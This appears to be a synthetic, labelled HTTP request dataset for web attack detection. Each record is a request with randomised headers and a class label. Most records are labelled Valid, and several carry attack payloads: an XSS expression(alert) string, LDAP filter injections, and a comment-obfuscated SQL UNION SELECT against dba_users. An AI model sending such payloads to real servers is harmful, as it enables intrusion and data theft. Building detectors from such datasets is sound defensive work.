GET /ni2ih/log4BthEX/fut/aflaeden08Ydne/MrNcs6bhn2v/nSM/6iee/hB8uHnqFx/s27gzqINCueK/iasmieTmr6neocpa4Opa.pl? HTTP/1.0
Host: 0.88.138.162
Connection: mt2e
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ineix0N-oosrt, nu-tet;q=0.2, rbfo-5ist, re3rut-Rueh
Cache-Control: min-fresh=70
Client-ip: 5.163.223.176
Cookie: oreenhicw9=t-F;omgr7rniadbl=usvaraa ciwezS;Abqlxf2relbo=06769;NFl85ulinkyXa=exmly?ooselectm
Cookie2: $Version="995"
Date: Thu, 06 Jan 05 05:49:40 CET
ETag: "fVcf6WcZKl0d257X"
Expect: 100-continue
From: dasa@Cnth.cz
If-Modified-Since: Tue, 09 Mar 10 10:08:37 UTC
If-Unmodified-Since: Sun, 01 Feb 09 18:08:02 UTC
If-Match: "79s8lQ@CwQawne0q"
If-None-Match: *
If-Range: *
Max-Forwards: 9523
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: hnknte 6dhe=ailltedl
Authorization: zfd7K xtsRai4=tiyswec
Range: 32-25
Referer: http://zBtmy.ch/UpeLowre/heWini/1dsa/secwlsg.jpg
TE: chunked;q=0.7,trailers,deflate
Trailer: Cache-Control
User-Agent: sf5va6ml (rJBiO8D5_; icez1ewwK; kzh8tCEMTM; o_kk6m; nUJEC5)
UA-CPU: 68000
UA-Disp: 991,432,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 9002x158
Via: cdegvs/7.6 www.toeAd.png
Transfer-Encoding: mamht
Upgrade: ztd/6.6, uveUC/2.7, edns/8.2, 7mo/6.6
Warning: 722 219.161.37.147 "eueen5o9vYS" "Tue, 30 Aug 05 03:30:07 CET"
X-Forwarded-For: 185.239.118.59
X-Serial-Number: 053261538285243
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2725
Start - Id: 13735
class: Valid
GET /m82UY6Ib/aes/m.OzQtDbpt/h-hXuT8ETsfFxd/4@ZNpux5MK4UUp0Fyecu/mrtwlaanhs/hm/wz6niu/r5d0u1ezAQADlJpns/iatweomwmtOan/uS@W5ndMSuMhCTUMb8Y/E59OQHe3.jpeg?8KBZLQS9Qhaving=1618&6h3tkdyaPloi=te&otEipr=090933506&gddoaaMgr=085383 HTTP/1.0
Host: 50.212.93.123
Connection: reiq5
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-store
Client-ip: 101.213.55.52
Cookie: c7rsc=098227070;hok=liMtIu_YJ;varoPsTpiM=dcq2;5metaRb= qkeeq;rvbscriptGFBOwHawhere=d6nege;3l=tb
Cookie2: $Version="764"
Date: Sat, 19 Jul 08 16:03:46 UTC
ETag: "iKZZUhuHAFVhGQ@q"
Expect: ASlkpsd=eshntn
From: ep4c@gnrwie6l.biz
If-Modified-Since: Sat, 23 May 09 16:34:52 CET
If-Unmodified-Since: Sun, 24 Sep 06 02:14:31 UTC
If-Match: "_ViZ_wS-zH8MXcM"
If-None-Match: *
If-Range: Tue, 19 May 09 19:26:14 UTC
Max-Forwards: 67
MIME-Version: 2.6
Pragma: aa5telen=insj
Proxy-Authorization: Basic aml1ajpDT2ph
Authorization: NTLM MXVsbG5lZXllYWhpdHVPb290a3llc2luc29jZWFwYTFlb3pmZW4=
Range: -4
Referer: /0Hon/rrtostA/ianlp1u2.exe
TE: trailers,trailers
Trailer: If-Range
User-Agent: dhUMCF http://www.sheiin.net
UA-CPU: PowerPC
UA-Disp: 096,0301,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6985x6776
Via: ndduba/9.8 12.23.78.26, 8.2 www.4noebard.tiff, ntocr/4.6 151.219.217.218
Transfer-Encoding: compress
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 799 www.lntleEda.png "elhhrlui" "Wed, 06 May 09 15:39:09 GMT"
X-Forwarded-For: 170.219.207.191
X-Serial-Number: 6046766144734
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 13735
Start - Id: 30580
class: Valid
GET /aezcoMeeagodi8r7kmr/bTS6WKCSCl13qJ/CMrl8_eKM.php3?OYwutieRWhu1O=214374&rg=0&E3=b_HvJa&l7=egCaN&1dw4tnlrrzupya=4451115&Bu0rtuieato=oaE6m HTTP/1.0
Host: 155.218.52.93
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.8
Accept-Encoding: deflate, deflate, identity;q=0.5, gzip, identity;q=0.3
Accept-Language: fhvne7lo-ftsMa;q=0.0, Haa-en;q=0.0, odd-Lwo;q=0.1, e-tNczyzTs;q=0.2, oseglajs-d7eloc;q=0.7
Cache-Control: no-transform
Client-ip: 61.132.5.63
Cookie: Ferolwi=lnnJYeuJSWB;iMguSJcmdE_=tcF2enR5na8qnt1;4Ylib05hb=aFIlR@;elohe4nel=6494346
Cookie2: $Version="30"
Date: Thu, 05 Mar 09 13:01:35 CET
ETag: W/"Zc9A6pDrlR_A1SV"
Expect: aina8
From: hmin@oar8.com
If-Modified-Since: Mon, 18 Feb 08 18:23:35 CET
If-Unmodified-Since: Thu, 30 Jul 09 18:21:14 GMT
If-Match: *
If-None-Match: "8rmIH@F0Qb58i_d"
If-Range: Sat, 22 Sep 07 01:30:48 UTC
Max-Forwards: 3121
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: dlri frtoat=ifoee5n
Authorization: NTLM bnhldHlvbHN0MGV0ZXJoeWFldTllZUg2dzVvMUhhYW9od3ROYmRoZWFz
Range: -185
Referer: /IhiRbIw/betiiir/h3atd1LC/brdt/vawwal.tar.gz
TE: deflate;q=0.2
Trailer: Warning
User-Agent: Mozilla/4.9 (Machintosh; U; Mac OS X 9.6; aw-ff; rv:4.0.8) Gecko/63979088
UA-CPU: 68000
UA-Disp: 8416,561,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0605x4751
Via: FTP/1.7 38.155.8.248
Transfer-Encoding: deflate
Upgrade: iicoun/9.2, tlnhD/8.4, i5ise/8.9
Warning: 981 www.tChen.tiff "enpV8eeRsnbvnineberf" 
X-Forwarded-For: 132.1.3.118
X-Serial-Number: 389571955
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30580
Start - Id: 47989
class: XSS
GET /N_vB/aYQRDUt6yU/U8ptelObt.png?tei1eeoec=8414307&oyhh=%3Cdiv+++++style+++%3D+%22width%3A++expression%28%5Balert+%28%27pnr%27%29%3B%5D%29%3B+++++%22++%3E&x4gt7vn=ns&tdiF@rm7Ejdp=Rde7lN&hy4ieh=n4EEenDpH3&0gNnjwp-C=ieae&kaeAp=t1gxWE5B8M4 HTTP/1.1
Host: 121.217.150.113
Connection: close
Accept: video/*, audio/*;q=0.0
Accept-Charset: iso-8859-8, euc-tw, x-mac-chinesesimp;q=0.1
Accept-Encoding: 
Accept-Language: etiea-as, thjAq-e1oz;q=0.8
Cache-Control: max-age=20
Client-ip: 200.176.81.45
Cookie: yaZ2=connectn
Cookie2: $Version="520"
Date: Sun, 30 Sep 07 22:38:30 CET
ETag: "AcDA7ZVQfWFDs3yE"
Expect: ssgt
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Tue, 26 Jan 10 13:17:37 CET
If-Unmodified-Since: Wed, 07 Mar 07 04:14:47 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Jun 09 04:52:23 GMT
Max-Forwards: 5301
MIME-Version: 1.7
Pragma: 2eEsr=ifwUf
Proxy-Authorization: Digest nc=b2c271ed
Authorization: Basic cTBzbzpoaW9scw==
Range: 2-,-873,110-95038
Referer: http://rhohee.it/swhdt3kL/Iofgu/eNeTahw/fnhe/as2d.mdb
TE: trailers,gzip
Trailer: User-Agent
User-Agent: dfcVsRuTxM http://www.8Sohw7W.biz
UA-CPU: 68000
UA-Disp: 719,994,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 480x167
Via: 0.0 www.eoiaxnzR.shtml, 6.2 www.otTwn3.tiff
Transfer-Encoding: deflate
Upgrade: ram/6.4, IrrLes/3.6, aomon/6.0
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 62.26.34.68
X-Serial-Number: 41529
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47989
Start - Id: 4448
class: Valid
POST /tqodcitmm6lEma/degj/rdtarttt/pi.nsf? HTTP/1.1
Content-Length: 186
Content-Language: udadk
Content-Encoding: compress
Content-Location: /hxsnz/iaEA/utTsahTl/HsSi.swf
Content-MD5: Y2dObHNtMnJ0YXdkb1NoaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Nov 06 04:14:45 CET
Last-Modified: Fri, 08 Feb 08 11:16:53 CET
Host: www.alfkdx.fr:2
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: max-age=46
Client-ip: 158.211.9.8
Cookie: ioiosm=nWx;vaf=heuree;Hnbn=275966523
Cookie2: $Version="774"
Date: Mon, 24 Dec 07 08:52:54 CET
ETag: "mzxtgr8iskt26MnB"
Expect: W9u3Rr=oeoit;Rrcabono=tnhrcw
From: onresk@onoddtq.be
If-Modified-Since: Thu, 13 Dec 07 21:55:55 CET
If-Unmodified-Since: Fri, 29 Dec 06 17:52:36 UTC
If-Match: *
If-None-Match: "De5@nio2_d-k-D.NB"
If-Range: Sun, 28 Sep 08 24:03:28 UTC
Max-Forwards: 62
MIME-Version: 2.9
Pragma: e1gxqa='heqi'
Proxy-Authorization: NTLM b29lUmVEb3NlemFlaTlleXRtZWl0c2FzbGxza2g4NnJubnNp
Authorization: 0P6b8 tsyf=esro
Range: 64421-813,254899-
Referer: http://www.fpeihc6h.be/hahtimtl/EGalznbu/ugNi8di.jpeg
TE: trailers,trailers
Trailer: Connection
User-Agent: rpAysMnt/3.3.6.7.2
UA-CPU: StrongARM
UA-Disp: 5974,926,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 604x596
Via: 3.0 www.sqnys.tiff:40
Transfer-Encoding: eenvm1
Upgrade: caueo/3.4, rif/5.0
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 9.134.134.209
X-Serial-Number: 053208446
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

iypmdrdonrr8=rmmXq&HRUacceptR2Y=m&asRc=zormnN=t4&tlnppspeyona=Diro&w2ratcHwUhhud=84667&stdin0agMPQgnc=pYp4fh8NGq&rbao=Zi&hurnqencu=wmhPkKZA6YVa&ocaFgpu=o8urcpO&group bynQ&iGefois=st7

End - Id: 4448
Start - Id: 9039
class: Valid
GET /aw6T2xAs-/d_eJXtK3HPvX9OvJFyV3.gif?QE8vtmpfromCa4u=izmerc&slqo9ondhsn=rnipdjGDD&irZ-z-xd5Th4=338875&aseethtoelsk5aq=jRrwFHY_vmmI&9lu0fgon=27 HTTP/1.1
Host: www.roine.uk
Connection: close
Accept: application/*
Accept-Charset: iso-8859-4;q=0.4, koi8, iso-8859-4, us-ascii
Accept-Encoding: compress;q=0.2
Accept-Language: rNssot-rwsOgesU;q=0.7, te7d9ti-iensex
Cache-Control: no-store
Client-ip: 46.125.203.213
Cookie: on4dl=igA9DNF
Cookie2: $Version="079"
Date: Sat, 21 Oct 06 05:19:47 GMT
ETag: W/"30kbexde-MHlHHe-2@3"
Expect: fstEe=rleuhia5;lee7msh=iAare
From: Am6elb@edtdUdomDe.fr
If-Modified-Since: Sat, 01 Mar 08 01:05:55 CET
If-Unmodified-Since: Sat, 20 Dec 08 18:13:16 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 31 Dec 08 04:07:45 GMT
Max-Forwards: 9751
MIME-Version: 0.6
Pragma: fapeur4e=2h
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: Basic aHJiY2U6c2FlYzE=
Range: -9,-8753
Referer: http://lUEsxBbl.biz/aibl.swf
TE: trailers,chunked;q=0.3
Trailer: TE
User-Agent: h8zooetne4
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 117x032
Via: FTP/2.6 www.WeGbh.shtml, shil/1.9 66.235.155.21
Transfer-Encoding: gzip
Upgrade: hrimd/4.4
Warning: 311 www.r8xnee.jpeg:94170 "sEobvmihha7nn" 
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 278976284
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9039
Start - Id: 26162
class: Valid
GET /t9U9SRA/eeejm5odnNojdd/eraNlsr2koah8hcn/nk0A-TU/@B/lssdYt6ewligidpddort.pl?ehc=87852&slyt=%263vbscript&ee=haiyfdintsU&rti=0743181653&riEsrvhaqn47lf=einrCvbscriptou+b4access_logautoexecssedor HTTP/1.1
Host: 106.84.2.209:80
Connection: close
Accept: text/*;q=0.1
Accept-Charset: windows-1250;q=0.3, x-mac-chinesesimp;q=0.2, x-mac-roman;q=0.4, iso-8859-2;q=0.3, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: dwtd-nopb, omd-sv;q=0.3
Cache-Control: max-stale
Client-ip: 110.150.5.172
Cookie: crmtirasbuc8u=cDkn0Q;DWlQ-pa7GIZA=vyX5;niaecDias2td=inagtsmsu;drisvbe7mahem=a9passthruhsystemRer-r FcLdt;7iwLaheacritrtm=5185;uritnnmmx=6poiS/|ustdinhtaccess formlocationed&dh
Cookie2: $Version="87"
Date: Fri, 03 Jun 05 15:28:24 CET
ETag: W/"9GWFxKBpXnAJdLqm"
Expect: 100-continue
From: dro4sne@hN7c.cz
If-Modified-Since: Sat, 02 Jun 07 05:33:18 CET
If-Unmodified-Since: Wed, 06 Sep 06 22:37:08 GMT
If-Match: *
If-None-Match: "EJ_FOjqybRbfdj0DP"
If-Range: Wed, 08 Dec 04 19:26:11 GMT
Max-Forwards: 899
MIME-Version: 1.3
Pragma: ht=tls
Proxy-Authorization: NTLM b3RnY291RWVubGUwdHplaGV1ZTd0dGF1emw2eW90MHRvcw==
Authorization: Digest opaque="Gonohwud"
Range: 0-357,4-25186
Referer: http://www.meue.st/snsac/Nwtr/oihFae/dddtc.conf
TE: chunked,chunked,trailers
Trailer: Warning
User-Agent: aoGssaa/0.8.8.7
UA-CPU: 68000
UA-Disp: 484,285,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7580x3767
Via: HTTP/1.6 30.107.229.196
Transfer-Encoding: identity
Upgrade: maeo2o/2.2, eosi/5.2
Warning: 243 215.45.32.215 "eictewu8s0mtw5" 
X-Forwarded-For: 61.241.105.229
X-Serial-Number: 77624336
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26162
Start - Id: 1690
class: Valid
GET /eval0-a.YH/hQb.jsp? HTTP/1.1
Host: 19.42.83.229:80
Connection: keep-alive
Accept: video/quicktime, application/postscript
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate;q=0.0, compress;q=0.9, deflate, compress
Accept-Language: *;q=0.6
Cache-Control: e5bel=1daMen8
Client-ip: 187.130.87.98
Cookie: 1rlCoMx=0099742;pSkYuF=twnx0;gWcdr=eecOy8e;cwuin1puo=lnnxp_ha;tSihreo=139025;F_Ot=e9w
Cookie2: $Version="6"
Date: Sat, 11 Jul 09 18:06:31 GMT
ETag: W/"Guq8N-HdhkeH6XJ1-_"
Expect: oeontso=mhebs;aosd=0gc1px
From: iNaNl@nioce.ch
If-Modified-Since: Tue, 30 Dec 08 03:22:16 GMT
If-Unmodified-Since: Fri, 17 Jun 05 11:37:22 GMT
If-Match: *
If-None-Match: *
If-Range: "a5nfHYDuIuNGj_YQEtxB"
Max-Forwards: 01
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM ZWwxc29vSWV1bm9lc2Y4ZHJlbGl4b3VzbnpnaFRvbnVJZUF5ZWxyTGlzcw==
Range: 73-
Referer: /prre/gDs5or/dxloc/dDnn6der.jsp
TE: trailers,trailers,chunked;q=0.4
Trailer: Expect
User-Agent: ef3dgms (bZk5gchW; aThAFGqY; ifuamL-n; nopq1OwS)
UA-CPU: StrongARM
UA-Disp: 5510,109,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3865x207
Via: FTP/7.6 13.240.47.45, FTP/2.4 www.e3eEib.jpg, HTTP/6.9 www.rteop.jpg
Transfer-Encoding: identity
Upgrade: Cboe45/0.9, y7qqr/0.3, dbob/3.5, rdnptE/6.4, aro/8.8
Warning: 300 92.186.4.96 "i1U7e" "Sat, 28 Feb 04 05:11:20 CET"
X-Forwarded-For: 64.253.35.40
X-Serial-Number: 3355979393710804862
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1690
Start - Id: 37531
class: LdapInjection
PUT /mahlOmbroeec2eas3e9f/gesuceehzeeaayumeE9i/m5EiaowsS/q09Bnb.bJElreKrD.htm? HTTP/1.0
Content-Length: 84
Content-Language: hih34bu
Content-Encoding: deflate
Content-Location: http://aauue.gov/7pole/eush/nsmuh/ol3nnh18/g2rmrort.css
Content-MD5: ZGluaW5oOGtpclN1bmFkYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 16:11:07 UTC
Last-Modified: Sat, 16 Feb 08 01:51:48 UTC
Host: 137.17.209.13
Connection: utsdNm
Accept: */*
Accept-Charset: x-mac-hebrew
Accept-Encoding: *
Accept-Language: 2qm-trftio9o, sie9-wkent;q=0.4, s-ib4mie;q=0.7, vaaete1i-ohRt;q=0.9, e93o-TXRen
Cache-Control: max-stale
Client-ip: 133.128.23.213
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Tue, 31 Jul 07 16:35:13 GMT
ETag: "HOTEkKcls_TWgyg7hA"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 23 Sep 04 03:54:05 UTC
If-Unmodified-Since: Tue, 19 Feb 08 21:48:39 CET
If-Match: "mx6513s4eb7GsNrm"
If-None-Match: *
If-Range: Tue, 06 Jan 04 11:55:55 CET
Max-Forwards: 102
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: rertml hneO5=eocht
Authorization: Digest nonce
Range: 0516-7855,069180-,334-
Referer: /Leae/le3e8/lywwtopy.png
TE: chunked
Trailer: TE
User-Agent: gTtK4k. http://www.idgAwen.biz
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 5.0 www.ssres.js, lSa6/2.2 242.132.221.129, dxwrlr/0.6 227.190.149.12
Transfer-Encoding: vltTj; slHnobo=ta87
Upgrade: njD/1.9
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

bnlrherqeaeker=613576&AwIwieorTVse=")(targetfilter=(o=NetscapeRoot))

End - Id: 37531
Start - Id: 14433
class: Valid
GET /eeNigyhg5snA6sio/kblpleosnKn/1si0texiepAzteheiz/yfnEy2ycQzRe0ZW1xr-.swf?Meliiritne6uusI=545933&rhrshd=wj8RT_KlV&etgnus=394&trtedierec2Kr=7amr&hzpJpBeW=tfiltih+kh&rg1connectiN79vYhttps=l.BW HTTP/1.1
Host: www.ci4wg9t.it
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-chinesetrad;q=0.8, euc-tw, windows-1251, x-mac-ce
Accept-Encoding: compress;q=0.1, compress;q=0.6
Accept-Language: *;q=0.6
Cache-Control: max-age=120
Client-ip: 239.225.229.87
Cookie: w5orst=oowuenrwfir
Cookie2: $Version="368"
Date: Thu, 12 Apr 07 01:02:22 CET
ETag: "LP9hdv0ROyxSDSQ0Q"
Expect: 100-continue
From: inuozal@th8rsa.cz
If-Modified-Since: Sun, 24 Sep 06 15:27:21 GMT
If-Unmodified-Since: Fri, 09 Dec 05 01:28:41 UTC
If-Match: "qVWKBiW6GEjZX4Fkgf"
If-None-Match: "IMSuC0kr7GMPr02b2pqZ"
If-Range: *
Max-Forwards: 50
MIME-Version: 1.0
Pragma: w8ba1qa='1rc'
Proxy-Authorization: Basic aHJpVGF0OmR0YXM=
Authorization: NTLM YWVvYXlzOW5vbWFyaGFldGJvbmRvc3podmVoY3lsYW1BaWRua3NnYWFlc2Fvcw==
Range: -0529
Referer: /qrrs/eeu9shew/mmdon/3atdp.png
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: rshnendt (tdpVSAj0rR; r8h5g-; n47Pp3LU; n20_Pa; 1Ceoej)
UA-CPU: 68000
UA-Disp: 3006,633,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: eE4/5.6 www.lha9W.jpg, FTP/2.5 7.14.237.60, FTP/7.8 45.176.135.87:67403
Transfer-Encoding: identity
Upgrade: swrIch/2.0, cnp/1.4, Ms3ey/4.3, Enm/6.8
Warning: 696 www.x5erorr.gif "amRedorfoi9a" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14433
Start - Id: 14295
class: Valid
GET /g1hoes2elEEmt8a/Dssqdnitutntybe8qd/yffX.HXcgGGv2VuG/lemwxest/tpI/pe5njEr/8-hv@eDapG/tZKkaabs9E/2-0D.iYoG.jpeg?elttNs=4435&sRnhi=hAj.Vqqy&aA1GN6_=7717043&nOe2h9hujho=82 HTTP/1.1
Host: www.pDeionn.it:80
Connection: close
Accept: text/*;q=0.7, image/gif;q=0.1
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: esxha-ese0cb, iejhi-as7mdoca, rc-4rp;q=0.5, ts2osem-ih, teliun-xgls
Cache-Control: no-store
Client-ip: 12.204.42.238
Cookie: aKHzyGUboot.ini@Tw=t%&;Cp=eppeg5a;GCperlf3=74819389
Cookie2: $Version="9"
Date: Sun, 18 Nov 07 23:06:27 GMT
ETag: "3gy0c8QKT8WDmqbWApH_"
Expect: mdtii
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Tue, 27 Oct 09 21:58:00 GMT
If-Unmodified-Since: Sat, 16 Jan 10 01:47:57 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Oct 08 15:15:33 UTC
Max-Forwards: 3
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic eXJuYjZlc0U6aHRBbmVv
Authorization: Basic dElwWjp0Z2tl
Range: 921-,-3
Referer: /pitdp/eNfere/lSsmdc/8kfdyv.php
TE: trailers,chunked;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: t@1NraFm http://www.nitsnO.org
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2883x951
Via: 9.1 www.rJhm5o5.css
Transfer-Encoding: gzip
Upgrade: anU/9.4, sythne/4.7, Tpsin/2.0, avn6ed/3.3, renTe/6.2
Warning: 099 231.6.177.213:01299 "naeeiEih" "Fri, 23 Feb 07 18:56:03 UTC"
X-Forwarded-For: 152.150.192.212
X-Serial-Number: 731610342681835186
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14295
Start - Id: 22761
class: Valid
GET /exp_Z_v5vI/_Mbf0t/tl2ta5msyhc/sFxRe6nDMO-a/5_3eA/eont.dll?ia=66112&Fomai.=9492&6icoenma=3&ihmnefxdDd=8307668828&uzoe=tgqDnEw&eu=nvLqtjTre&wiipDolfvsI=64&gIgE=otsic7tcee%7Cccit&EpSF=2b&cnaeYnsds5alt=nhnpa%5C&nnp=divdarlelikeT&UACddp2gEsaf=aLh7t6V-4&upYhnantrklsh3o=p%26&fmlbs=20288653&jROeadlaIst1hd=iofi2geunte HTTP/1.1
Host: www.ehjemy.cz
Connection: xlitisc
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate, gzip, deflate;q=0.2, deflate, deflate;q=0.2
Accept-Language: g1tt-8rmmbn;q=0.3, ami3-3Obe, gc-vaatdth;q=0.2, e11n-2
Cache-Control: nOaasu='uoAdfeo'
Client-ip: 139.70.230.47
Cookie: 9wnrrntbesbK=7872
Cookie2: $Version="4"
Date: Sun, 04 Jun 06 02:17:37 UTC
ETag: W/"VYWarfDOSm5pKt_9-"
Expect: 100-continue
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Wed, 20 Jan 10 01:47:58 CET
If-Unmodified-Since: Sun, 21 Jun 09 14:04:10 CET
If-Match: "HwOnOAhT0sMi@NG2eknj"
If-None-Match: *
If-Range: "3XTJ-qeYZd@E5qUI"
Max-Forwards: 223
MIME-Version: 1.1
Pragma: hlen='d'
Proxy-Authorization: NTLM c2Jwb2FhdHlhem9nbnN1aEFsaGhuYmM2cGVtbWhlbWFuc3R5cm5uZWNFYWVTSWE=
Authorization: Digest response="d806CC1DAd1eba5E09B7c239Bb70aB6f"
Range: 107-,-730361,-9
Referer: /eeEei/nhendr/sq9ehne.htm
TE: gzip,deflate
Trailer: If-Match
User-Agent: sRanaa (wSGZqqkCwr; ys0esBg; lWrReH7Pl)
UA-CPU: 68000
UA-Disp: 156,3199,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 803x313
Via: 2.9 203.117.178.58, 2.6 182.219.60.245:18299
Transfer-Encoding: identity
Upgrade: crGNN6/3.2, s85tN/6.9, i3wcat/6.3
Warning: 220 www.psjets.htm "artli" "Fri, 27 Jun 08 01:21:07 GMT"
X-Forwarded-For: 247.95.67.80
X-Serial-Number: 46126280
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22761
Start - Id: 37039
class: LdapInjection
GET /xtmtnhcmlf1oueodrsa4/tbDrih/ekerxaqri/rpER.Q@tDO6pb6O1.jpg?alcdsedhozhisqm=42%29%28%26%28objectClass%3Dei4%29%28%7C%28sn++++%3Dtn%29%28cn%3Dht++J*%29%29&UrWQmailWHZ=625&fvsit=dr%2BE%3Bttean&henn8t=eLZTy1&ehcnreredvo=+%5Cdmail&oe=1&hlIolkiyooh9s=lNjOt&TD5qTinputandou=abb%40Ku&wslmsc=39178883&an8not7w=nhl%5D%3Cs8hwh0d&raanee3obheP=822271&fTc=060585863 HTTP/1.1
Host: 0.141.243.90:1326
Connection: koIoot
Accept: application/rtf;q=0.6
Accept-Charset: iso-2022-kr, iso-2022-jp, iso-8859-5
Accept-Encoding: 
Accept-Language: ttpn-ofaiceme, mrom-ras, woiir-hdu9;q=0.8
Cache-Control: max-age=40163
Client-ip: 243.154.255.184
Cookie: EiyrcoyR4hgnEd=svMI18MYpqg-;sUZ9KMaO=742;w.g@g._Seqs9=2066097;Dzei3cbetiOi=lmqnelnbr;1m7heooy=seaomh0og
Cookie2: $Version="6"
Date: Sat, 01 Nov 08 23:35:27 GMT
ETag: "Nwi0NjG_4ak-fCi9N.eQ"
Expect: kodtt
From: ugo11f@oeeH7o.uk
If-Modified-Since: Sun, 23 May 04 17:59:34 CET
If-Unmodified-Since: Tue, 09 Dec 08 04:53:48 UTC
If-Match: *
If-None-Match: "xA.HK8rw-qF53ktNCer"
If-Range: Wed, 31 May 06 13:46:46 CET
Max-Forwards: 666
MIME-Version: 5.5
Pragma: Di=h
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: Digest cnonce="REnaYh"
Range: -742236,5-8909,-634
Referer: /Aee5t/eMmtd.asp
TE: chunked,deflate
Trailer: Date
User-Agent: Mozilla/5.4 (Windows; U; WinNT 0.3; dt-Rn; rv:1.5.0) Gecko/90829402
UA-CPU: MIPS
UA-Disp: 370,042,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: 2.1 201.140.223.201:942
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: nopuat/4.5
Warning: 929 www.pogutin.htm "rmhurl" 
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37039
Start - Id: 41667
class: SqlInjection
GET /oKZVu/hWclDqw-9-62/e@RtR6J/tiMomtornSi/r@-nyxo/lj_h4/iabSSuNac/tLR1Svw2je@WWa.7.n9./efoh7I40SE.h4K1e/f4SooM.html?dca=lsihtio%27vqc1otnG&1JgV=t9_&fpAes=oZislmhibiaeomn&49ti=tI++oOe%2B&Wictun=+nT&shwb8obpbs=ntAia&Eat3rIitgtOe=ietaccess_logeh&tf=86887&J4bTx0FW8NW=5995512&Klu3Rsamahbjle=taE%27%2F**%2FUNION%2F**%2FSELECT%2F**%2Frnaahcoe%2F**%2FFROM%2F**%2Fdba_users%2F**%2FWHERE%2F**%2Flmm5c%2F**%2Flike%2F**%2F%27%2525&7lje=82694807&L0zEQ=nDaTAPs%401&URJe8snode=9 HTTP/1.1
Host: www.o1iews6h.com
Connection: keep-alive
Accept: image/jpeg;q=0.3, text/plain;q=0.1, application/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.1
Accept-Language: Lasimeos-l2wese
Cache-Control: no-cache
Client-ip: 239.57.78.114
